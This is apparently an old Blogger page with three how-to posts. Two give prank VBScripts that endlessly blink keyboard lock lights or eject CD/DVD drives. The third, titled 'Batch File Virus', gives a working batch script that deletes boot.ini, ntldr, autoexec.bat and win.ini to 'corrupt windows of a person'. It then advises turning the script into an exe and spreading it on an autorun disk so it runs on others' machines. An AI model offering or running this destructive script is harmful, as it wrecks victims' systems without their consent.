Showing posts with label batch file virus. Show all posts
Showing posts with label batch file virus. Show all posts

Make Your Keyboard Light Blink

Monday, August 15, 2011

Want to see your keyboard light blinking constantly like a disco??
If yes, this is for you.

1st open your notepad

just copy and paste the code written below:-

Set wshShell =wscript.CreateObject("WScript.Shell")
do
wscript.sleep 200
wshshell.sendkeys "{CAPSLOCK}"
wscript.sleep 100
wshshell.sendkeys "{NUMLOCK}"
wscript.sleep 50
wshshell.sendkeys "{SCROLLLOCK}"
loop


Now go to file then save as and then give any name you want with vbs extension.
means :- whatevername.vbs


Then it should create a vbs script file.
Double click on it.
Now see the keyboard lights(NUM lock,CAPS lock,SCROLL lock)
It starts blinking.

Here is a another script it blinks another style.
Do as above but now paste this code:-


Set wshShell =wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "{CAPSLOCK}"
wshshell.sendkeys "{NUMLOCK}"
wshshell.sendkeys "{SCROLLLOCK}"
loop


save it as anyname.vbs like above
and double click the vbs filee to see the another style

NOTE:- To stop this go to task manager then processes and find wscript.exe
end that process. it stops blinking.

Open DVD or cd drive infinitely - fun with VBS script




We can do many funny things with VBS scripts and one of the most famous trick is ejecting a cd/dvd drive infinitely. In our previous posts we had given some of the best notepad tricks but not this type of funny(some what prank) vbs script. So lets see how to do it.
Step #1: Open up your notepad and copy paste the following code.

Set oWMP = CreateObject("WMPlayer.OCX.7" )
Set colCDROMs = oWMP.cdromCollection
if colCDROMs.Count >= 1 then
do
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next ' cdrom
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next ' cdrom
loop
End If
Step #2: Now name it as you wish with .vbs extection EX: openup.vbs
That’s it your done, to activate it just double click the file you just created. If you wish stop it open task manager by pressing ctrl+alt+del > click on process tab > find the process wscript.exe > highlight it and click End process

Batch File Virus (a simple virus for windows)

Thursday, August 11, 2011

I assume you know the basic about batch files before reading this post. Batch files are used to run a dos command without opening command prompt window. You can run many dos commands using a single batch file. For this you have to learn how to write a batch file. I am not going to tell you how to make a batch file. If you don’t know how to write, try to learn it from anywhere else. This post will show you some batch files which can corrupt your window. You can also say that these batch files can work like a virus. So be careful and not to try in your computer.




  • Autoexec.bat
  • Ntldr
  • Boot.ini
  • Win.ini
These files are very important and necessary for any windows operating system. So if you want to corrupt windows of a person you have to delete these four files from the computer.
@echo off 
attrib -r -s -h c:\autoexec.bat 
del c:\autoexec.bat 
attrib -r -s -h c:\boot.ini 
del c:\boot.ini 
attrib -r -s -h c:\ntldr 
del c:\ntldr 
attrib -r -s -h c:\windows\win.ini 
del c:\windows\win.ini 

save this code as winVirus.bat.

If you want to make it more harmful, make its exe using bat_to_exe converter and make an autorun disk of it. When someone use the disk autorun will execute itself and command will generated by batch file will corrupt the windows.
 
Support : Creating Website
Copyright © 2012. Your Unofficial Guide - All Rights Reserved
Proudly powered by Blogger